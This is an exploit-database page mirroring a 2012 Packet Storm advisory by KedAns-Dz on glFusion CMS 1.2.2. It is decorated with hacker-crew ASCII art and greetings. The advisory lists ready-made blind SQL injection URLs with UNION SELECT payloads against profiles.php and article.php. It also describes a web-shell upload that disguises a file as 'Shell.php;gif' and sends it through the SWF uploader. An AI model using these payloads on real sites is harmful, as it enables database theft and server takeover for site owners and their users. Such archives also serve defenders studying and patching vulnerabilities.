Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormKedAns-DzPACKETSTORM:109033
HistoryJan 24, 2012 - 12:00 a.m.

glFusion CMS 1.2.2 Shell Upload / SQL Injection

2012-01-2400:00:00
KedAns-Dz
packetstormsecurity.com
22
JSON
`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm KedAns-Dz member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
###  
# Title : glFusion CMS v1.2.2 Multiple Vulnerabilites  
# Author : KedAns-Dz  
# E-mail : [email protected] ([email protected]) | [email protected] | [email protected]  
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)  
# Web Site : www.1337day.com  
# Facebook : http://facebook.com/KedAns   
# platform : php ( Blind SQLi / File Upload )  
# Type : WebApp / 0day  
###  
  
##  
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |  
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |  
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |  
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. |  
# | ------------------------------------------------- < |  
###  
  
# [+] Blind SQL Inj3cti0n =>  
  
!> ../[vulnerF].php?[p0c]= <+ Bl!nd SQLi Her3 +>  
  
http://[host]/[path]/profiles.php?sid=-1+UNION+SELECT+1,2,3,4,5,version(),NULL,6--  
http://[host]/[path]/article.php?story='1 AND 2=-1 UNION SELECT 1,2,3,4,5,version(),NULL,6--  
  
# [+] File Upload ( via SWF Uploader ) =>  
  
+> upload Shell.php;gif ...  
  
http://[host]/[path]/mediagallery/swfupload/swfupload.php  
http://[host]/[path]/mediagallery/swfupload/swfupload.swf  
  
  
# sP^tHanX & Gr33tZ t0 : Omar (www.l3b-r1z.com) | And My fr!ndS 0n HMD ^___^ <3 <3  
  
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================  
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy   
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)   
# Inj3ct0r Members 31337 : Indoushka * KnocKout * Kalashinkov3 * SeeMe * ZoRLu * anT!-Tr0J4n  
# Anjel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever  
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X  
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX  
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..  
#=================================================================================================  
`
JSON